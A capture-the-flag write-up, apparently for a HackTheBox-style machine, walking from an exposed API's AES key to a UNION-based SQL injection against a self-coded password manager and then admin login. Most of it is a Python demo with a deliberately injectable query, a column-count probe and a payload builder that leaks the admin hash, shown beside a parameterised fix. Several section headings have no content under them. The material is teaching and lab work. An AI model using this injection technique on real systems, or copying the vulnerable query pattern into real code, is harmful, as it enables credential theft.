
Extracting hashes

Why bother to guess or retrieve the master key when we already know the endpoint it is calling?

Moreover, the binary does not appear to decrypt anything with the master key. It simply displays the content of the response from the API, so we should call the endpoint directly!


A seemingly weird AES key is provided to us.

AES key

SQL injection

This seems to be the password manager Juliette mentioned. Pretty basic.

It also looks self-coded, so it is probably prone to vulnerabilities.

Fiddling with the parameters shows that it is vulnerable to UNION-based SQL injection, which lets us leak the admin password hash.
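To make the UNION step concrete, here is an added example (not code from the box or from this write-up) that rebuilds the pattern against an in-memory SQLite database. The table and column names, the search endpoint's query, and the sample rows are all assumptions; the box's real schema is not shown on this page. It walks through the two things you actually do by hand: find the column count with ORDER BY, then append a UNION SELECT of matching width that pulls the admin hash out of another table. The parameterised version alongside it shows why the same payload is harmless once user input stops being concatenated into the query.

```python
import hashlib
import sqlite3

# Constructed sample data standing in for the self-coded password manager's DB.
# Schema and values are assumptions for the demo, not the target's real ones.
ADMIN_HASH = hashlib.sha256(b"correct horse battery staple").hexdigest()


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        CREATE TABLE entries (id INTEGER PRIMARY KEY, owner TEXT, site TEXT, secret TEXT);
        """
    )
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)",
                 ("admin", ADMIN_HASH))
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)",
                 ("juliette", hashlib.sha256(b"x").hexdigest()))
    conn.execute("INSERT INTO entries (owner, site, secret) VALUES (?, ?, ?)",
                 ("juliette", "mail", "enc:abc"))
    conn.commit()
    return conn


def search_vulnerable(conn: sqlite3.Connection, site: str) -> list:
    """Hand-rolled search: the parameter is pasted straight into the SQL text,
    so a quote followed by UNION SELECT can graft rows from any other table."""
    sql = f"SELECT site, secret FROM entries WHERE site = '{site}'"
    return conn.execute(sql).fetchall()


def search_fixed(conn: sqlite3.Connection, site: str) -> list:
    """Same query with a bound parameter: the payload is just a literal string."""
    sql = "SELECT site, secret FROM entries WHERE site = ?"
    return conn.execute(sql, (site,)).fetchall()


def count_columns(query_fn, conn: sqlite3.Connection, max_cols: int = 8) -> int:
    """Probe ORDER BY n upward; the largest n that does not error is the width
    of the original SELECT, which a UNION must match exactly."""
    cols = 0
    for n in range(1, max_cols + 1):
        try:
            query_fn(conn, f"mail' ORDER BY {n}-- ")
            cols = n
        except sqlite3.OperationalError:
            break
    return cols


def injection_payload(cols: int) -> str:
    """UNION of the right width: username and password fill the first two
    slots, NULL pads any remaining columns. The trailing -- comments out the
    closing quote the original query appends."""
    selects = ["username", "password"] + ["NULL"] * (cols - 2)
    return ("nosuchsite' UNION SELECT " + ", ".join(selects)
            + " FROM users WHERE username = 'admin'-- ")


def leak_admin_hash(conn: sqlite3.Connection):
    """End-to-end: measure the column count, then pull the admin hash through
    the vulnerable search. Returns None if nothing came back."""
    cols = count_columns(search_vulnerable, conn)
    rows = search_vulnerable(conn, injection_payload(cols))
    return rows[0][1] if rows else None


if __name__ == "__main__":
    db = build_db()
    print("columns:", count_columns(search_vulnerable, db))
    print("leaked :", leak_admin_hash(db))
    print("fixed  :", search_fixed(db, injection_payload(2)))
```

The search term 'nosuchsite' is chosen so the legitimate half of the UNION returns nothing and the first row back is the grafted one. On a real target the column count probe and the visible column that echoes back to the page are what take the time; the rest is the same one-line payload.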


Decrypting using the AES key

With the AES key obtained from the API and the data leaked through the SQL injection, we can decrypt it.

Password hash

Login as admin

With this, we can log in as admin and obtain root.txt.